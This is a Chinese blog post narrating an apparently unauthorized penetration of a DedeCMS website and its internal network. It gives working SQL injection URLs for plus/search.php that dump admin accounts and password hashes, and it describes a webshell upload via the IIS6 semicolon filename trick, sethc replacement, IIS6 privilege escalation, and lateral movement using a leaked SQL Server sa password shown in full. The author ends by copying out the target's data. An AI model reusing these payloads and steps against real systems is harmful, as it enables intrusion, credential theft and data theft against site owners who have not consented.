Author:Ciph2r
今天闲来无事,大哥发来一个站说,去日站. 唉 大哥心中实战是比什么都重要的
既然是这样的话,拿到目标站,随手加上一个robots.txt
(本文章所有网址已用127.0.0.1代替)
织梦? 看看对应版本号
可以直接用语句爆帐号密码
- /plus/search.php?keyword=as&typeArr[111%3D@`\’`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\’`+]=a
复制代码
回显出1
再利用
- plus/search.php?keyword=aaas&typeArr[111%3D@`\’`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\’`+]=a
复制代码
爆出admin 密码解不出来…
先想办法把后台弄到吧
可是密码解不出来怎么办
查询旁站
随便点进去发现都是dede
柿子挑软的捏
爆出数据库连接文件 尝试后发现不能外连 伤心ing…
其他的几个dede漏洞都修补了 难道去C段? 那样耗神耗精力的 – -可是我还是去了
还是话说柿子挑软的捏 直接上IIS Put scanner扫描 整个C段发现了一个有写入权限的iis
可是尝试过后发现因为种种不知名的原因 写入不了..
好吧 还是回去看目标站 回想起来 我记得dedecms注入的时候 用第一个语句每次都会出来很多账户的 为什么只爆出了admin ? 这种站不可能只有admin一个账户
- plus/search.php?keyword=aaas&typeArr[111%3D@`\’`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\’`+]=a
复制代码
发现 limit 0,1就是说从第1行开始返回一行 那我把改成1试试
- plus/search.php?keyword=aaas&typeArr[111%3D@`\’`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+1,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\’`+]=a
复制代码
果然不出所料 爆出了第二个账户 以此类推 2,1 3,1 4,1 5,1 全部爆出了用户和密码
解出密码到后台登录
发现是普通用户权限
功能很少
没有文件管理器之类的 也没有上传权限
尝试下拿shell
在生成这里点更新主页html 浏览
在这里上传一个马就行了 前提是iis6
- Php.php;php.html
复制代码
就成功拿下了
全目录遍历 组建都在 感觉这次提权会很容易 (可是目的又不是这个)
找到mysql目录 把文件下载下来 可是我觉得密码会解不开 因为开始后台密码都没解出来 可见管理员的密码不是弱口令
唉 我这乌鸦嘴
随便看看 发现system32下都有权限 直接转发出来 然后替换sethc,发现dllcache目录没权限.. 还是老老实实溢出吧
直接iis6溢出后 抓到管理员密码 登录上去 去主站找到root密码
翻数据库 发现没有自己想要的 接着就翻服务器 好多乱七八糟的文件 翻的过程就不说有多艰苦了 我甚至觉得数据没在这服务器上 找了一通宵…
接着翻浏览器的记录 发现了一个东西
- \\192.168.10.99
复制代码
就知道数据肯定不在这服务器上
翻这个服务器分享的目录 发现UID=sa;PWD=730428
上传一个sql分析器 看看那台服务器有没有我们要的东西
直接加一个用户
一进桌面 发现
我瞬间像发现了新大陆 事实证明不是的
开始连接的时候报错 说password=000000
肯定是配置文件错了 去目录下修改下目录文件 成功打开了 可是不知道密码怎么办
直接sqlserver查查数据库
发现第三个可以登录
登录上去后 发现什么都没有!! 什么都没有
就不截图了
又在想 是不是数据在另外一台服务器呢?可是又怎么知道另外一台服务器在那里呢
(找到了 可是密码不知道 – -)
一下就烦了,突然想到 既然这个软件的数据库sqlserver里面有保存 那肯定如果这服务器上有数据库的话 肯定也能查询到阿
OK 找到了自己要的数据了 友情备份一下 (肯定有人会在这里打我)
别忘了还有一台服务器
直接连接上去 用户名为 xxxxxx04
这尼玛我去哪里弄密码? 不如瞎猫碰死耗子 试试xxxxxx 不带04试试
直接就进去了 … 可是一登录进去自动有一个软件
到这里实在进不去了 这次渗透到这里也就结束了吧
人实在是比较懒 一般弄完之后也懒得写文章之类的 这次文章都是基友代发的 以后尽量有好的实例都写下来吧
转载请注明:jinglingshu的博客 » 一次渗透笔记